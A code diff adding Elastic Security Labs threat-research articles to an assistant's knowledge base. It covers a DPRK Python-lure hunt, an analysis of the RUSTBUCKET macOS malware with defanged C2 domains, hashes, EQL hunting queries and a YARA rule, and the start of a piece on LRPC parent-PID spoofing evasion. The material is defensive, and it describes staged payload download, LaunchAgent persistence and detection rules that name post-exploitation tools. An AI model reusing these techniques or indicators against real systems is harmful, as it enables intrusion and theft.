+The threat actor could use the execution functionality to open an interactive shell on the target system to carry out post-exploitation actions. We have seen nation-state actors employ an interactive shell like this. We could use this rule to look for the creation of this interactive shell via Python.
+
+### [Hunt] Suspicious Python Child Process Execution
+
+```
+process where event.type == "start" and event.action == "exec" and process.parent.name : "python*"
+ and process.name : ("screencapture", "security", "csrutil", "dscl", "mdfind", "nscurl", "sqlite3", "tclsh", "xattr")
+```
+
+The threat actor could also use this code execution capability to directly execute system binaries for various post-exploitation goals or actions. This rule looks for the direct execution of some local system tools that are not commonly used, especially via Python.
+
+## Conclusion and Future Trends
+
+As we've explored throughout this analysis, the Democratic People's Republic of Korea (DPRK) has emerged as a formidable force in state-sponsored cyber operations. Combining social engineering with Python-based lures, their approach has proven successful in organizations with wide-ranging security maturity.
+
+Their use of Python for initial access operations is a testament to the evolving nature of cyber threats. By leveraging this versatile and widely used programming language, threat actors have found a powerful tool that offers both simplicity in development and complexity in obfuscation. This dual nature of Python in their hands has proven to be a significant challenge for cybersecurity defenders.
+
+Our deep dive into this recent sample has provided valuable insights into DPRK threat actors' current tactics, techniques, and procedures (TTPs). This case study exemplifies how social engineering and tailored Python scripts can work in tandem as highly effective initial access vectors.
+
+As state-sponsored cyber operations advance, the insights gained from studying DPRK's methods become increasingly valuable. Cybersecurity professionals must remain alert to the dual threat of social engineering and sophisticated Python-based tools. Defending against these threats requires a multi-faceted approach, including robust technical controls, comprehensive staff training on social engineering tactics, and advanced threat detection capabilities focused on identifying suspicious Python activities.
+
+As we move forward, fostering collaboration within the cybersecurity community and sharing insights and strategies to counter these sophisticated threats is crucial. We hope to stay ahead in this ongoing cyber chess game against state-sponsored actors like the DPRK through collective vigilance and adaptive defense mechanisms.
+
+
+### Resources
+
+* [Fake recruiter coding tests target devs with malicious Python packages](https://www.reversinglabs.com/blog/fake-recruiter-coding-tests-target-devs-with-malicious-python-packages)
+* [Threat Assessment: North Korean Threat Groups](https://unit42.paloaltonetworks.com/threat-assessment-north-korean-threat-groups-2024/)
+* [DeFied Expectations — Examining Web3 Heists | Google Cloud Blog](https://cloud.google.com/blog/topics/threat-intelligence/examining-web3-heists)
+* [Elastic catches DPRK passing out KANDYKORN — Elastic Security Labs](https://www.elastic.co/security-labs/elastic-catches-dprk-passing-out-kandykorn)
diff --git a/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/dprk_strikes_using_a_new_variant_of_rustbucket.md b/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/dprk_strikes_using_a_new_variant_of_rustbucket.md
new file mode 100644
index 0000000000000..41e182af17026
--- /dev/null
+++ b/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/dprk_strikes_using_a_new_variant_of_rustbucket.md
@@ -0,0 +1,344 @@
+---
+title: "The DPRK strikes using a new variant of RUSTBUCKET"
+slug: "DPRK-strikes-using-a-new-variant-of-rustbucket"
+date: "2023-07-14"
+subtitle: "A DPRK campaign using a new variant of the RUSTBUCKET malware is underway with updated capabilities and reduced signature detection."
+description: "Watch out! We’ve recently discovered a variant of RUSTBUCKET. Read this article to understand the new capabilities we’ve observed, as well as how to identify it in your own network."
+author:
+- slug: salim-bitam
+- slug: ricardo-ungureanu
+- slug: colson-wilhoit
+- slug: seth-goodwin
+- slug: andrew-pease
+image: "photo-edited-12@2x.jpg"
+category:
+- slug: attack-pattern
+- slug: activity-group
+tags:
+- ref9135
+- rustbucket
+- dprk
+- bluenoroff
+- cryptocurrency
+- apt38
+---
+## Key takeaways
+- The RUSTBUCKET malware family is in an active development phase, adding built-in persistence and focusing on signature reduction.
+- REF9135 actors are continually shifting their infrastructure to evade detection and response.
+- The DPRK continues financially motivated attacks against cryptocurrency service providers.
+- If you are running Elastic Defend, you are protected from REF9135
+
+
+## Preamble
+The Elastic Security Labs team has detected a new variant of the RUSTBUCKET malware, a family that has been previously attributed to the BlueNorOff group by [Jamf Threat Labs](https://www.jamf.com/blog/bluenoroff-apt-targets-macos-rustbucket-malware/) in April 2023.
+
+This variant of RUSTBUCKET, a malware family that targets macOS systems, adds persistence capabilities not previously observed and, at the time of reporting, is undetected by VirusTotal signature engines. Elastic Defend behavioral and prebuilt detection rules provide protection and visibility for users. We have also released a signature to prevent this malware execution.
+
+The research into REF9135 used host, binary, and network analysis to identify and attribute intrusions observed by this research team, and other intelligence groups, with high confidence to the Lazarus Group; a cybercrime and espionage organization operated by the Democratic People’s Republic of North Korea (DPRK).
+
+This research will describe:
+
+- REF9135’s use of RUSTBUCKET for sustained operations at a cryptocurrency payment services provider
+- Reversing of an undetected variant of RUSTBUCKET that adds a built-in persistence mechanism
+- How victimology, initial infection, malware, and network C2 intersections from first and third-party collection align with previous Lazarus Group reporting
+
+
+## RUSTBUCKET code analysis
+
+
+### Overview
+Our research has identified a persistence capability not previously seen in the RUSTBUCKET family of malware, leading us to believe that this family is under active development. Additionally, at the time of publication, this new variant has zero detections on VirusTotal and is leveraging a dynamic network infrastructure methodology for command and control.
+
+
+
+![Execution flow of REF9135](/assets/images/DPRK-strikes-using-a-new-variant-of-rustbucket/image1.jpg)
+
+### Stage 1
+During Stage 1, the process begins with the execution of an AppleScript utilizing the **%2Fusr%2Fbin%2Fosascript** command. This AppleScript is responsible for initiating the download of the Stage 2 binary from the C2 using cURL. This session includes the string **pd** in the body of the HTTP request and **cur1-agent** as the User-Agent string which saves the Stage 2 binary to **%2Fusers%2Fshared%2F.pd,** ([7887638bcafd57e2896c7c16698e927ce92fd7d409aae698d33cdca3ce8d25b8](https://www.virustotal.com/gui/file/7887638bcafd57e2896c7c16698e927ce92fd7d409aae698d33cdca3ce8d25b8)).
+
+
+
+![Stage 1 command line](/assets/images/DPRK-strikes-using-a-new-variant-of-rustbucket/image2.jpg)
+
+### Stage 2
+The Stage 2 binary ( **.pd** ) is compiled in Swift and operates based on command-line arguments. The binary expects a C2 URL to be provided as the first parameter when executed. Upon execution, it invokes the **downAndExec** function, which is responsible for preparing a POST HTTP request. To initiate this request, the binary sets the User-Agent string as **mozilla%2F4.0 (compatible; msie 8.0; windows nt 5.1; trident%2F4.0)** and includes the string **pw** in the body of the HTTP request.
+
+
+
+![Setting the HTTP parameters before sending the request](/assets/images/DPRK-strikes-using-a-new-variant-of-rustbucket/image12.jpg)
+
+During execution, the malware utilizes specific macOS APIs for various operations. It begins with [NSFileManager's](https://developer.apple.com/documentation/foundation/nsfilemanager) **temporaryDirectory** function to obtain the current temporary folder, then generates a random UUID using [NSUUID's](https://developer.apple.com/documentation/foundation/nsuuid) **UUID.init** method. Finally, the malware combines the temporary directory path with the generated UUID to create a unique file location and writes the payload to it.
+
+Once the payload, representing Stage 3 of the attack is written to disk, the malware utilizes [NSTask](https://developer.apple.com/documentation/foundation/nstask) to initiate its execution.
+
+
+
+![Generating the Stage 3 file path](/assets/images/DPRK-strikes-using-a-new-variant-of-rustbucket/image11.jpg)
+
+### Stage 3
+In Stage 3, the malware ([9ca914b1cfa8c0ba021b9e00bda71f36cad132f27cf16bda6d937badee66c747](https://www.virustotal.com/gui/file/9ca914b1cfa8c0ba021b9e00bda71f36cad132f27cf16bda6d937badee66c747)) is a FAT macOS binary that supports both ARM and Intel architectures written in Rust. It requires a C2 URL to be supplied as a parameter.
+
+The malware initiates its operations by dynamically generating a 16-byte random value at runtime. This value serves as a distinctive identifier for the specific instance of the active malware. Subsequently, the malware proceeds to gather comprehensive system information, including:
+
+- Computer name
+- List of active processes
+- Current timestamp
+- Installation timestamp
+- System boot time
+- Status of all running processes within the system
+
+The malware establishes its initial connection to the C2 server by transmitting the gathered data via a POST request. The request is accompanied by a User-Agent string formatted as **Mozilla%2F4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident%2F4.0)**.
+
+Upon receiving the request, the C2 server responds with a command ID, which serves as an instruction for the malware. The malware is designed to handle only two commands.
+
+
+
+#### Command ID 0x31
+This command directs the malware to self-terminate.
+
+
+
+#### Command ID 0x30
+This command enables the operator to upload malicious Mach-O binaries or shell scripts to the system and execute them. The payload is stored in a randomly generated temporary path and created within the current user TMP directory following the naming convention of **`$TMPDIR%2F.\<8 random digits\>`**
+
+Below is a summary of the command structure, indicating the constants, arguments, and payload components for easy comprehension.
+
+
+
+![Command structure example](/assets/images/DPRK-strikes-using-a-new-variant-of-rustbucket/image5.jpg)
+
+The malware proceeds by granting execution permissions to the uploaded file using the **chmod** API.
+
+After executing the payload, the malware sends a status update to the server, notifying it of the completed execution, and then sleeps for 60 seconds. Following this delay, the malware loops to collect system information once again and remains in a waiting state, anticipating the arrival of the next command from the server
+
+
+
+### The undetected version of RUSTBUCKET
+Using code similarities from the sample in our telemetry, we searched VirusTotal and identified an undetected variant of RUSTBUCKET.
+
+As of the publication of this research, the [newly discovered version](https://www.virustotal.com/gui/file/de81e5246978775a45f3dbda43e2716aaa1b1c4399fe7d44f918fccecc4dd500) of the malware has not been flagged by any antivirus engines on VirusTotal. A thorough analysis of the sample brought to light the addition of a new persistence capability and C2 infrastructure. The behavioral rules for Elastic Defend prevent, and Elastic’s prebuilt detection rules identify, this activity. We have also released a signature that will prevent this new variant of RUSTBUCKET.
+
+
+
+![VirusTotal results at the time of publication](/assets/images/DPRK-strikes-using-a-new-variant-of-rustbucket/image7.png)
+
+### Persistence
+A predominant method utilized by malware to achieve persistence on macOS is through the utilization of LaunchAgents. In macOS, users have individual LaunchAgents folders within their Library directory, enabling them to define code that executes upon each user login. Additionally, a system-level LaunchAgents folder exists, capable of executing code for all users during the login process. Elastic Defend monitors for the creation of LaunchAgents and LaunchDaemons containing malicious or suspicious values as a way to detect these persistence techniques.
+
+In the case of this updated RUSTBUCKET sample, it establishes its own persistence by adding a plist file at the path **`%2FUsers%2F\<user\>%2FLibrary%2FLaunchAgents%2Fcom.apple.systemupdate.plist`** , and it copies the malware’s binary to the following path **`%2FUsers%2F\<user\>%2FLibrary%2FMetadata%2FSystem Update`**.
+
+
+
+![File content of plist used for persistence](/assets/images/DPRK-strikes-using-a-new-variant-of-rustbucket/image9.jpg)
+
+There are several elements of the plist file, using standard true%2Ffalse or string values:
+
+- **Label:** The key "Label" specifies the name of the LaunchAgent, which in this case is **com.apple.systemupdate**. This expects a string value.
+- **RunAtLoad:** This indicates that the LaunchAgent should execute its associated code immediately upon loading, specifically during system startup or user login. This expects a true%2Ffalse value.
+- **LaunchOnlyOnce:** This prevents the malware from being executed multiple times concurrently and expects a true%2Ffalse value.
+- **KeepAlive:** This key instructs the system to keep the LaunchAgent running and relaunch it if it terminates unexpectedly. This expects a true%2Ffalse value.
+- **ProgramArguments:** The "ProgramArguments" key specifies an array of strings that define the program or script to be executed by the LaunchAgent. This expects a string value and in this case, the LaunchAgent executes the file located at **"`%2FUsers%2F\<user\>%2FLibrary%2FMetadata%2FSystem Update`"** and provides the C2 URL **"https:%2F%2Fwebhostwatto.work[.]gd"** as an argument to the malware.
+
+
+## RUSTBUCKET and REF9135 analysis
+
+
+### Overview
+The RUSTBUCKET campaign has previously been associated with BlueNorOff by Jamf and Sekoia.io. BlueNorOff is believed to be operating at the behest of the DPRK for the purposes of financial gain in order to ease the strain of global sanctions. BlueNorOff is a sub-unit of the overarching DPRK offensive cyber attack organization, the [Lazarus Group](https://attack.mitre.org/groups/G0032/). The [2016 Bangladesh Bank robbery](https://www.nytimes.com/interactive/2018/05/03/magazine/money-issue-bangladesh-billion-dollar-bank-heist.html) stands out as BlueNorOff's most notorious attack, wherein their objective was to illicitly transfer over $850M from the Federal Reserve Bank of New York account owned by Bangladesh Bank, the central bank of Bangladesh, by exploiting the SWIFT network.
+
+
+
+> As an analyst note, if you’re interested in a tremendously verbose and detailed walkthrough of this intrusion, Geoff White and Jean Lee released a 19-part podcast through the [BBC World Service](https://www.bbc.co.uk/programmes/w13xtvg9/episodes/downloads) that is an unbelievable account of this event.
+
+### Networking infrastructure
+The persistence mechanism identified previously calls out to **https:%2F%2Fwebhostwatto.work[.]gd**. Third-party research into this URL indicates that 12%2F89 [VirusTotal](https://www.virustotal.com/gui/url/e299c9f2233f025256ab29d53d070a8f94d1c2c1a2b6f3a7c13e16df185e9e32/detection) vendors have identified it as malicious, and it exists within a community collection documenting the [DangerousPassword phishing campaign](https://www.cyfirma.com/outofband/tracking_dangerouspassword_campaign_by_lazarusgroup/).
+
+
+
+![VT detections and community collections for https://webhostwatto.work[.]gd](/assets/images/DPRK-strikes-using-a-new-variant-of-rustbucket/image6.png)
+
+VirusTotal [last saw](https://www.virustotal.com/gui/domain/webhostwatto.work.gd/detection) the domain pointing to **104.168.167[.]88**. Which has been specifically identified in a Sekoia.io [blog](https://blog.sekoia.io/bluenoroffs-rustbucket-campaign/) in May as part of BlueNorOff’s RUSTBUCKET campaign.
+
+
+
+![Updated RUSTBUCKET IP (104.168.167[.]88) previously identified by Sekoia.io](/assets/images/DPRK-strikes-using-a-new-variant-of-rustbucket/image4.jpg)
+
+Further connecting **webhostwatto.work[.]gd** to DangerousPassword, BlueNorOff, and the DPRK campaigns, this domain shares a TLS leaf certificate fingerprint hash ( **1031871a8bb920033af87078e4a418ebd30a5d06152cd3c2c257aecdf8203ce6** ) with another domain, **companydeck[.]online**.
+
+**companydesk[.]online** is included in the [VirusTotal Graph](https://www.virustotal.com/graph/g6e8b200cfd774d129558fa5715c83d1bc81099f5cd7643719580be988ec01b8f) (VirusTotal account required) for [APT38](https://attack.mitre.org/groups/G0082/), which is also known as DangerousPassword, BlueNorOff, etc.
+
+
+
+![Selection from the VirusTotal Graph for DangerousPassword](/assets/images/DPRK-strikes-using-a-new-variant-of-rustbucket/image3.jpg)
+
+DangerousPassword and BlueNorOff are campaigns that have both been previously associated with the DPRK.
+
+Using the IP address (**64.44.141[.]15**) for our initial C2 domain, **crypto.hondchain[.]com**, we uncovered 3 additional C2 domains:
+
+- **starbucls[.]xyz**
+- **jaicvc[.]com**
+- **docsend.linkpc[.]net** (dynamic DNS domain)
+
+While there are only 5 hosts (4 total domains) registered to the C2 IP address (indicating that this was not a high-capacity hosting server), we looked for additional relationships to increase the association confidence between the domains. To do this, we replicated the same fingerprinting process previously used with **webhostwatto.work[.]gd**. The TLS fingerprint hash for **starbucls[.]xyz** ( **788261d948177acfcfeb1f839053c8ee9f325bd6fb3f07637a7465acdbbef76a** ) is the same fingerprint as **jaicvc[.]com**.
+
+With these two domains having the same TLS fingerprint hash and the fact that they were both registered to the IP address, we were able to cluster these atomic entities, and their siblings, together with high confidence:
+
+- All hosts were registered to **64.44.141[.]15**
+- **starbucls[.]xyz** and **crypto.hondchain[.]com** were observed being used by our malware samples
+- **starbucls[.]xyz** and **jaicvc[.]com** shared a TLS fingerprint
+
+
+![Domains registered to REF9135 C2 IP address](/assets/images/DPRK-strikes-using-a-new-variant-of-rustbucket/image8.jpg)
+
+Looking at the “First” column (when they were first observed through 3rd party passive DNS), these hosts are being created rapidly, likely as an attempt to stay ahead of detection efforts by research teams. We are associating the following domains and IP address to the REF9135 campaign with high confidence:
+
+- **starbucls[.]xyz**
+- **jaicvc[.]com**
+- **crypto.hondchain[.]com**
+- **64.44.141[.]15**
+
+We have not observed **docsend.linkpc[.]net** being used with the RUSTBUCKET samples we analyzed. However, its shared IP registration and host siblings lead us to state with a moderate degree of confidence that it is directly related to RUSTBUCKET and REF9135 as C2 infrastructure; and a high degree of confidence that it is malicious (shared infrastructure as part of other campaigns).
+
+
+
+### Defense evasion
+The campaign owners used techniques to hinder the collection of Stage 2 and Stage 3 binaries by analysts who may have overlooked User-Agent strings in their investigations, as well as internet scanners and sandboxes focused on collecting malicious binaries.
+
+As outlined in the Stage 1 section, there is a specific User-Agent string ( **cur1-agent** ) that is expected when downloading the Stage 2 binary, if you do not use the expected User-Agent, you will be provided with a 405 HTTP response status code (Method Not Allowed).
+
+It also appears that the campaign owners are monitoring their payload staging infrastructure. Using the expected User-Agent for the Stage 3 binary download (**mozilla%2F4.0 (compatible; msie 8.0; windows nt 5.1; trident%2F4.0)**), we were able to collect the Stage 3 binary.
+
+Finally, we observed REF9135 changing its C2 domain once we began to collect the Stage 2 and 3 binaries for analysis. When making subsequent requests to the original server (**crypto.hondchain[.]com**), we received a 404 HTTP response status code (Not Found) and shortly after, a new C2 server was identified (**starbucls[.]xyz**). This could be because we caught the binary before it was rolled off as part of a normal operational security practice (don’t leave your valuable payload attached to the Internet to be discovered) or because they observed a connection to their infrastructure that was not from their targeted network.
+
+Of note, while the User-Agent strings above could initially appear to be the default cURL or Firefox User-Agents strings to an analyst, they are not. The default cURL User-Agent string is **curl%2Fversion.number** whereas the malware uses **cur1-agent** (using a **1** in place of the **l** in “curl”). Additionally, the “Firefox” string is all lowercase (**mozilla%2F4.0 (compatible; msie 8.0; windows nt 5.1; trident%2F4.0)**), unlike actual [Firefox User-Agent strings](https://www.useragentstring.com/pages/Firefox/) which are camel-cased.
+
+This requirement to download payloads allows the attackers to restrict distribution to only requestors who know the correct UA string. This provides strong protection against both scanning services and researchers, who would otherwise have early access to hosted malicious files for analysis and detection engineering.
+
+
+
+### Victimology
+The REF9135 victim is a venture-backed cryptocurrency company providing services to businesses such as payroll and business-to-business transactions with a headquarters in the United States. This victim fits the mold from prior reporting on BlueNorOff targeting organizations with access to large amounts of cryptocurrency for theft.
+
+
+
+## Observed adversary tactics and techniques
+Elastic uses the MITRE ATT&CK framework to document common tactics, techniques, and procedures that advanced persistent threats use against enterprise networks.
+
+
+
+### Tactics
+Tactics represent the why of a technique or sub-technique. It is the adversary’s tactical goal: the reason for performing an action.
+
+- [Initial access](https://attack.mitre.org/tactics/TA0001)
+- [Execution](https://attack.mitre.org/tactics/TA0002)
+- [Defense evasion](https://attack.mitre.org/tactics/TA0005)
+- [Discovery](https://attack.mitre.org/tactics/TA0007)
+- [Lateral movement](https://attack.mitre.org/tactics/TA0008/)
+- [Command and control](https://attack.mitre.org/tactics/TA0011)
+
+
+## Diamond model
+Elastic Security utilizes the [Diamond Model](https://www.activeresponse.org/wp-content/uploads/2013/07/diamond.pdf) to describe high-level relationships between adversaries, capabilities, infrastructure, and victims of intrusions. While the Diamond Model is most commonly used with single intrusions, and leveraging Activity Threading (section 8) as a way to create relationships between incidents, an adversary-centered (section 7.1.4) approach allows for a, although cluttered, single diamond.
+
+
+
+![REF9135 Diamond Model](/assets/images/DPRK-strikes-using-a-new-variant-of-rustbucket/image13.jpg)
+
+## Detection logic
+
+
+### Prevention
+- [MacOS.Trojan.RustBucket](https://github.com/elastic/protections-artifacts/blob/main/yara/rules/MacOS_Trojan_RustBucket.yar)
+- [Persistence via Suspicious Launch Agent or Launch Daemon](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/persistence_persistence_via_suspicious_launch_agent_or_launch_daemon.toml)
+
+
+### Hunting queries
+The events for EQL are provided with the Elastic Agent using the Elastic Defend integration. Hunting queries could return high signals or false positives. These queries are used to identify potentially suspicious behavior, but an investigation is required to validate the findings.
+
+
+
+#### EQL queries
+Using the Timeline section of the Security Solution in Kibana under the “Correlation” tab, you can use the below EQL queries to hunt for behaviors observed in REF9135.
+
+**Suspicious Curl File Download via Osascript**
+
+
+
+```
+process where process.parent.name : "osascript" and process.name : "curl" and process.args : "-o"
+```
+
+ **Suspicious URL as argument to Self-Signed Binary**
+
+
+
+```
+process where event.type == "start" and event.action == "exec" and 
+ process.code_signature.trusted == false and 
+ process.code_signature.signing_id regex~ """[A-Za-z0-9\_\s]{2,}\-[a-z0-9]{40}""" and 
+ process.args : "http*" and process.args_count <= 3
+```
+
+#### YARA
+Elastic Security has created YARA rules to identify this activity. Below are YARA rules to identify the RUSTBUCKET malware:
+
+
+
+```
+ rule MacOS_Trojan_RustBucket {
+    meta:
+        author = "Elastic Security"
+        creation_date = "2023-06-26"
+        last_modified = "2023-06-26"
+        license = "Elastic License v2"
+        os = "MacOS"
+        arch = "x86"
+        category_type = "Trojan"
+        family = "RustBucket"
+        threat_name = "MacOS.Trojan.RustBucket"
+        reference_sample = "9ca914b1cfa8c0ba021b9e00bda71f36cad132f27cf16bda6d937badee66c747"
+        severity = 100
+
+    strings:
+        $user_agent = "User-AgentMozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)"
+        $install_log = "/var/log/install.log"
+        $timestamp = "%Y-%m-%d %H:%M:%S"
+    condition:
+        all of them
+}
+```
+
+## References
+The following were referenced throughout the above research:
+
+- [https:%2F%2Fwww.jamf.com%2Fblog%2FBlueNorOff-apt-targets-macos-rustbucket-malware%2F](https://www.jamf.com/blog/bluenoroff-apt-targets-macos-rustbucket-malware/)
+- [https:%2F%2Fblog.sekoia.io%2FBlueNorOffs-rustbucket-campaign%2F](https://blog.sekoia.io/bluenoroffs-rustbucket-campaign/)
+
+
+## Observations
+All observables are also available for [download](https://github.com/elastic/labs-releases/tree/main/indicators/rustbucket) in both ECS and STIX format in a combined zip bundle.
+
+The following observables were discussed in this research.
+
+| Observable | Type | Name | Reference |
+| --- | --- | --- | --- |
+| webhostwatto.work[.]gd | Domain | N%2FA | REF9135 C2 domain |
+| crypto.hondchain[.]com | Domain | N%2FA | REF9135 C2 domain |
+| starbucls[.]xyz | Domain | N%2FA | REF9135 C2 domain |
+| jaicvc[.]com | Domain | N%2FA | REF9135 C2 domain |
+| docsend.linkpc[.]net | Domain | N%2FA | REF9135 C2 domain |
+| companydeck[.]online | Domain | N%2FA | Associated by REF9135 TLS fingerprint hash |
+| 104.168.167[.]88 | ipv4 | N%2FA | REF9135 C2 IP address |
+| 64.44.141[.]15 | ipv4 | N%2FA | REF9135 C2 IP address |
+| 788261d948177acfcfeb1f839053c8ee9f325bd6fb3f07637a7465acdbbef76a | x509-certificate | jaicvc[.]com | REF9135 C2 TLS fingerprint hash |
+| 1031871a8bb920033af87078e4a418ebd30a5d06152cd3c2c257aecdf8203ce6 | x509-certificate | webhostwatto.work[.]gd | REF9135 C2 TLS fingerprint hash |
+| 9ca914b1cfa8c0ba021b9e00bda71f36cad132f27cf16bda6d937badee66c747 | SHA-256 | N%2FA | MacOS.Trojan.RustBucket |
+| 7fccc871c889a4f4c13a977fdd5f062d6de23c3ffd27e72661c986fae6370387 | SHA-256 | N%2FA | MacOS.Trojan.RustBucket |
+| ec8f97d5595d92ec678ffbf5ae1f60ce90e620088927f751c76935c46aa7dc41 | SHA-256 | N%2FA | MacOS.Trojan.RustBucket |
+| de81e5246978775a45f3dbda43e2716aaa1b1c4399fe7d44f918fccecc4dd500 | SHA-256 | ErrorCheck | MacOS.Trojan.RustBucket |
+| 4f49514ab1794177a61c50c63b93b903c46f9b914c32ebe9c96aa3cbc1f99b16 | SHA-256 | N%2FA | MacOS.Trojan.RustBucket |
+| fe8c0e881593cc3dfa7a66e314b12b322053c67cbc9b606d5a2c0a12f097ef69 | SHA-256 | N%2FA | MacOS.Trojan.RustBucket |
+| 7887638bcafd57e2896c7c16698e927ce92fd7d409aae698d33cdca3ce8d25b8 | SHA-256 | %2FUsers%2FShared%2F.pd | Stage 2 |
+
+
+
diff --git a/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/effective_parenting_detecting_lrpc_based_parent_pid_spoofing.md b/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/effective_parenting_detecting_lrpc_based_parent_pid_spoofing.md
new file mode 100644
index 0000000000000..6b38d05a10ae6
--- /dev/null
+++ b/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/effective_parenting_detecting_lrpc_based_parent_pid_spoofing.md
@@ -0,0 +1,204 @@
+---
+title: "Effective Parenting - detecting LRPC-based parent PID spoofing"
+slug: "effective-parenting-detecting-lrpc-based-parent-pid-spoofing"
+date: "2023-03-29"
+description: "Using process creation as a case study, this research will outline the evasion-detection arms race to date, describe the weaknesses in some current detection approaches and then follow the quest for a generic approach to LRPC-based evasion."
+author:
+  - slug: john-uhlmann
+image: "blog-thumb-sorting-colors.jpg"
+category:
+  - slug: security-research
+tags:
+  - windows internals
+  - defense evasion
+---
+
+Adversaries currently utilize [RPC](https://docs.microsoft.com/en-us/windows/win32/rpc/)’s client-server architecture to obfuscate their activities on a host – including [COM](https://docs.microsoft.com/en-us/windows/win32/com/com-technical-overview#remoting) and [WMI](https://docs.microsoft.com/en-us/windows/win32/wmisdk/wmi-architecture) which are both RPC-based. For example, a number of local RPC servers will happily launch processes on behalf of a malicious client - and that form of defense evasion is difficult to flag as malicious without being able to correlate it with the client.
+
+![Annotated process tree showing the breaks in the behaviour graph](/assets/images/effective-parenting-detecting-lrpc-based-parent-pid-spoofing/image23.jpg)
+
+The above annotated screenshot is the logical process tree after a Microsoft Word macro called three COM objects, each exposing a `ShellExecute` interface and also the WMI `Win32\_Process::Create` method. The WMI call has specialized telemetry that can reconstruct that Microsoft Word initiated the process creation (the blue arrow), but the COM calls don’t (the red arrows). So defenders have no visibility that Microsoft Word made a COM call over an RPC call to spawn PowerShell elsewhere on the system.
+
+The defender is left with a challenge to interpretation because of this lack of context - Word spawning PowerShell is a red flag, but is _Explorer_ spawning PowerShell malicious, or simply user behavior?
+
+RPC will typically use [LRPC](https://learn.microsoft.com/en-us/windows/win32/rpc/selecting-a-protocol-sequence) as the transport for inter-process communication. Using process creation as a case study, this research will outline the evasion-detection arms race to date, describe the weaknesses in some current detection approaches and then follow the quest for a generic approach to LRPC-based evasion.
+
+## A Brief History of Child Process Evasion
+
+It is often very beneficial for adversaries to spawn child processes during intrusions. Using legitimate pre-installed system tools to achieve your aims saves on capability development time and can potentially evade security instrumentation by providing a veneer of legitimacy for the activity.
+
+However, for the activity to look plausibly legitimate, the parent process also needs to seem plausible. The classic counter-example is that Microsoft Word spawning PowerShell is highly anomalous. In fact, Elastic SIEM includes a prebuilt rule to detect [suspicious MS Office child processes](https://www.elastic.co/guide/en/security/current/suspicious-ms-office-child-process.html) and Elastic Endpoint will also [prevent malicious execution](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/initial_access_powershell_obfuscation_spawned_via_microsoft_office.toml). As documented in the Elastic [Global Threat Report](https://www.elastic.co/explore/security-without-limits/global-threat-report), suspicious parent/child relationships was one of the three most common defense evasion techniques used by threats in 2022.
+
+Endpoint Protection Platform (EPP) products could prevent the most egregious process parent relationships, but it was the rise of Endpoint Detection and Response (EDR) approaches with pervasive process start logging and the ability to retrospectively hunt that established a scalable approach to anomalous process tree detection.
+
+Adversaries initially pivoted to evasions using a [Win32 API feature introduced in Windows Vista](https://blog.didierstevens.com/2009/11/22/quickpost-selectmyparent-or-playing-with-the-windows-process-tree/) to support User Account Control (UAC) that allows a process to specify a different logical parent process to the real calling process. However, [endpoint security could still identify the real parent process](https://blog.f-secure.com/detecting-parent-pid-spoofing/) based on the calling process context during the [process creation notification callback](https://learn.microsoft.com/en-us/windows-hardware/drivers/ddi/ntddk/nf-ntddk-pssetcreateprocessnotifyroutine), and [detection rule](https://www.elastic.co/guide/en/security/current/parent-process-pid-spoofing.html) coverage was quickly re-established.
+
+New evasion techniques evolved in response, and a common method currently leveraged by adversaries is to indirectly spawn child processes via RPC – including [DCOM](https://docs.microsoft.com/en-us/windows/win32/com/com-technical-overview#remoting) and [WMI](https://docs.microsoft.com/en-us/windows/win32/wmisdk/wmi-architecture) which are both RPC-based. RPC can be either inter-host or simply inter-process. The latter is oxymoronically called Local Remote Procedure Call (LRPC).
+
+The most well-known of these was the [`Win32\_Process::Create`](https://learn.microsoft.com/en-us/windows/win32/cimwin32prov/create-method-in-class-win32-process) WMI method. In order to detect this, Microsoft appears to have explicitly added a new [`Microsoft-Windows-WMI-Activity`](https://github.com/jdu2600/Windows10EtwEvents/blame/master/manifest/Microsoft-Windows-WMI-Activity.tsv) ETW event in Windows 10 1809. The new event 23 included the client process id - the missing data point needed to associate the activity with a requesting client.
+
+Unfortunately adversaries were quickly able to pivot to alternate process spawning out-of-process RPC servers such as [`MMC20.Application::ExecuteShellCommand`](https://learn.microsoft.com/en-us/previous-versions/windows/desktop/mmc/view-executeshellcommand). Waiting for Microsoft to add telemetry to dual-purpose out-of-process RPC servers [one-by-one](https://en.wikipedia.org/wiki/Whac-A-Mole) wasn’t going to be a viable detection approach, so last year we set out on a side quest to generically associate LRPC server actions with the requesting LRPC client process.
+
+## Detecting LRPC provenance
+
+The majority of previous public RPC telemetry research has focused on inter-host lateral movement – typically spawning a process on a remote host. For example: - [Lateral Movement using the MMC20.Application COM Object](https://enigma0x3.net/2017/01/05/lateral-movement-using-the-mmc20-application-com-object/)- [Lateral Movement via DCOM: Round 2](https://enigma0x3.net/2017/01/23/lateral-movement-via-dcom-round-2/)- [Endpoint Detection of Remote Service Creation and PsExec](https://blog.f-secure.com/endpoint-detection-of-remote-service-creation-and-psexec/) - [Utilizing RPC Telemetry](https://posts.specterops.io/utilizing-rpc-telemetry-7af9ea08a1d5)- [Detecting Lateral Movement techniques with Elastic](https://www.elastic.co/blog/hunting-for-lateral-movement-using-event-query-language) - [Stopping Lateral Movement via the RPC Firewall](https://zeronetworks.com/blog/stopping-lateral-movement-via-the-rpc-firewall/)
+
+The ultimate advice for defenders is typically to monitor RPC network traffic for anomalies or, better yet, to block unnecessary remote access to RPC interfaces with [RPC Filters](https://www.akamai.com/blog/security/guide-rpc-filter) (part of the [Windows Filtering Platform](https://learn.microsoft.com/en-us/windows/win32/fwp/)) or specific RPC methods with 3rd party tooling like [RPC Firewall](https://github.com/zeronetworks/rpcfirewall).
+
+Unfortunately these approaches don’t work when the adversary uses RPC to spawn a process elsewhere on the same host. In this case, the RPC transport is typically [ALPC](https://learn.microsoft.com/en-us/windows/win32/etw/alpc) - monitoring and filtering at the network layer does not then apply.
+
+On the host, detection engineers typically look to leverage telemetry from the inbuilt Event Tracing (including EventLog) in the first instance. If this proves insufficient, then they can investigate custom approaches such as user-mode function hooking or mini-filter drivers.
+
